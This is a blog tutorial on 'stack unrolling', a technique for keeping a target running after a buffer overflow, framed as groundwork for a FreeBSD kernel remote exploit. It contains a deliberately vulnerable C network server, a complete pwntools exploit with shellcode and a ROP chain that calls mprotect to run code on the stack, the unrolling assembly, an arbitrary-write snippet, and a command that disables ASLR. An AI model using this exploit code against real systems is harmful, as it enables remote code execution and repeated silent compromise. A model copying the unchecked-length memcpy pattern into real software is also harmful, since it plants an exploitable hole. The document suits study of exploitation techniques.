Stack unrolling

Hello.
In this blog, I will talk about stack unrolling techniques which is mostly used on kernel exploit.
The Goal behind stack unrolling is primarily to avoid crash after buffer is overwritten, by returning to the calling function, the target software can continue to run without segmentation fault alike.

This is mainly used on kernel exploit because, often kernel exploit is broken into multiple parts to achieve successful remote code execution in case of a remote bug. we'll apply this techniques in the case of a generic remote freebsd kernel exploit. 

This allow us to overcome the limitation of payload size, by sending multiple payload separately.
I'm using a Linux distribution Ubuntu with gdb-peda and ASLR disabled.
Disabling ASLR in Ubuntu :  
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space 
 
We use the vulnerable c server below for demo.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
typedef struct server
{
int socket_fd;
struct addrinfo *addrinfo;
} server_t;
#define PKT_SIZE 100
int server_init(server_t *server, char *port);
int server_bind(server_t *server);
int server_listen(server_t *server, int max_client);
int server_accept(server_t *server);
static void stack_two(char *packet);
static void stack_one(char *packet);
int server_init(server_t *server, char *port)
{
server->socket_fd = socket(AF_INET, SOCK_STREAM, 0);
if (server->socket_fd == -1)
{
perror("Failed to create socket");
return -1;
}
if (setsockopt(server->socket_fd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int)) < 0)
{
perror("Failed to setsockopt socket");
return -1;
}
struct addrinfo hints;
bzero(&hints, sizeof(struct addrinfo));
hints.ai_family = AF_INET;
hints.ai_socktype = SOCK_STREAM;
hints.ai_flags = AI_PASSIVE;
int err = getaddrinfo(NULL, port, &hints, &server->addrinfo);
if (err != 0)
{
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(err));
return err;
}
return 0;
}
int server_bind(server_t *server)
{
if (bind(server->socket_fd, server->addrinfo->ai_addr, server->addrinfo->ai_addrlen) == -1)
{
perror("Failed to bind to socket");
return -1;
}
return 0;
}
int server_listen(server_t *server, int max_client)
{
if (listen(server->socket_fd, max_client) == -1)
{
perror("Failed to listen to socket");
return -1;
}
return 0;
}
int server_accept(server_t *server)
{
struct sockaddr clientAddr;
int clientAddrLen = sizeof(struct sockaddr);
char buffer[256 * 2];
int client_fd, ret;
client_fd = accept(server->socket_fd, &clientAddr, &clientAddrLen);
if(client_fd == -1)
{
perror("Failed to accept client");
return -1;
}
printf("Client Connected\n");
ret = 0;
ret = recv(client_fd, buffer, sizeof(buffer), 0);
if(ret == -1)
{
perror("recv");
close(client_fd);
close(server->socket_fd);
exit(6);
}
printf("Here is the message: %s\n", buffer);
stack_one(&buffer[0]);
return 0;
}
static void stack_two(char *packet)
{
char buffer_two[PKT_SIZE];
unsigned char pkt_len = 0;
pkt_len = (unsigned char)(*packet);
printf("Packet len : %d\n", pkt_len);
memcpy(buffer_two, packet, pkt_len * 2);
printf("buffer_two : %s\n", buffer_two);
}
static void stack_one(char *packet)
{
char buffer_one[PKT_SIZE];
stack_two(packet);
}
int main(int argc, char *argv[])
{
int err = 0;
server_t server = {0};
server_init(&server, argv[1]);
server_bind(&server);
server_listen(&server, 10);
while (1)
{
server_accept(&server);
}
return 0;
}
view raw server-vuln.c hosted with ❤ by GitHub


We have a buffer overflow vulnerability in stack_two function. It's take the length used in the memcpy from the packet without checking it's size against the actual buffer size. 
Compilation:
gcc -fno-stack-protector -o server-vuln server-vuln.c
./server-vuln 8080


Here is our exploit:
from pwn import *
from struct import pack
import sys
import os
def u8(x):
return pack("B", x)
conn = remote('localhost',8080)
shellcode = b"\x48\x83\xc4\x08"
shellcode += b"\x66\x83\x3c\x24\x02"
shellcode += b"\x75\xf5"
shellcode += b"\x81\x7c\x24\x04\x7f\x00\x00\x01"
shellcode += b"\x75\xeb"
shellcode += b"\x48\x83\xc4\x20\x5d\xc3"
print (len(shellcode))
length = len(shellcode)
payload = u8(255)
payload += b"\x90"
payload += b"\x90" * (110 - length)
payload += shellcode
payload += pack("<Q", 0x4141414141414141)
payload += pack("<Q", 0x00007ffff79e5b96) # pop rdx
payload += pack("<Q", 0x00007ffff79e5b96)
payload += pack("<Q", 0x00007ffff7b404ce) # mov rdi,rsp call rdx
payload += pack("<Q", 0x00007ffff7a3c6ed) # mov rax, rdi ; ret
payload += pack("<Q", 0x00007ffff79e5b96) # pop rdx ; ret
payload += pack("<Q", 0xfffffffffffff000)
payload += pack("<Q", 0x00007ffff7a21f35) # and rax, rdx ; movq xmm0, rax ; ret
payload += pack("<Q", 0x00007ffff7a22b0b) # pop rcx ; ret
payload += pack("<Q", 0x00007ffff7a07e6a)
payload += pack("<Q", 0x00007ffff7a7ef53) # mov rdi, rax ; call rcx
payload += pack("<Q", 0x00007ffff7a07e6a) # pop rsi ; ret
payload += pack("<Q", 0x0000000000001000)
payload += pack("<Q", 0x00007ffff79e5b96) # pop rdx ; ret
payload += pack("<Q", 0x7)
payload += pack("<Q", 0x7ffff7affae0)
payload += pack("<Q", 0x00007ffff7b146b5) # pop r10 ; ret
payload += pack("<Q", 0xa20 + 1)
payload += pack("<Q", 0x00007ffff7a20a4b) # add rdi, r10 ; jmp rdi
"""
0x00000000000586ed : mov rax, rdi ; ret
0x00007ffff7a21f35 : and rax, rdx ; movq xmm0, rax ; ret
0x00007ffff79e5b96: pop rdx ; ret 0xfffffffffffff000
0x00007ffff7a07e6a pop rsi ; ret
0x00007ffff7a22b0b pop rcx ; ret
0x00007ffff7a7ef53 : mov rdi, rax ; call rcx
0x7ffff7a957c5 xor rax, rax ; ret
0x00007ffff7b146b5 : pop r10 ; ret 0xa20 [Offeset to buff]
0x00007ffff7a20a4b : add rdi, r10 ; jmp rdi
"""
conn.send(payload)
conn.close()
view raw stack-unroll.py hosted with ❤ by GitHub


 First let's run first the exploit before explaining it's internal.
                                                       Figure 1: The server running on port 8080
                                                         Figure 2: The actual exploit sending payload multiple time

In General, the exploit use ROP gadget to make the stack executable by using the current value of RSP and by calling mprotect. Our actual payload to unroll the stack is located on the stack just before the ROP gadget address.

The shellcode used to unroll the stack is extracted from this assembly code
SECTION .text
global _start
_start:
add rsp, 0x8
cmp WORD [rsp], 0x0002
jne _start
cmp DWORD [rsp + 4], 0x100007f
jne _start
add rsp, 0x20
pop rbp
ret
view raw unroll.asm hosted with ❤ by GitHub


The role of the shellcode is:
- Increment the value of RSP
- Check for first signature on the stack 
- jump to start if not egal
- check for a second signature 
- jump again if not egal
- adjust the value of RSP
- Popping rbp
- ret

The signature in our case is the local IP address located on the stack in the function server_accept. This function declare a struct sockaddr which used to
store the IP address of the connected client.

The shellcode walk the stack from stack_two stack frame upward until it match a signature. Because we are exploiting the server from localhost, we are looking for the local address IP as signature on the stack.
If we were exploiting this from a remote machine, then we just look for our own ip address in the stack.


                                              Figure 3: Backtrace, frame for server_accept


In our case:
&clientAddr: 0x7fffffffdd20
rbp at 0x7fffffffdd40 

The difference is 0x20.
Once the signature matched, we add 0x20 to the current RSP, and as we want to return in the  main function we pop rbp and execute ret.

The server can continue it's normal execution.
In one image.

Now you can add an additional payload before the stack unrolling payload like an arbitrary write primitive.
 
        mov rax, destaddr
        mov rbx, data
        mov QWORD [rax], rbx

        
Using this you can send multiple 8 bytes separately from network while keeping the serve running without any crash.

We'll apply this in the Freebsd kernel generic remote exploit.




Comments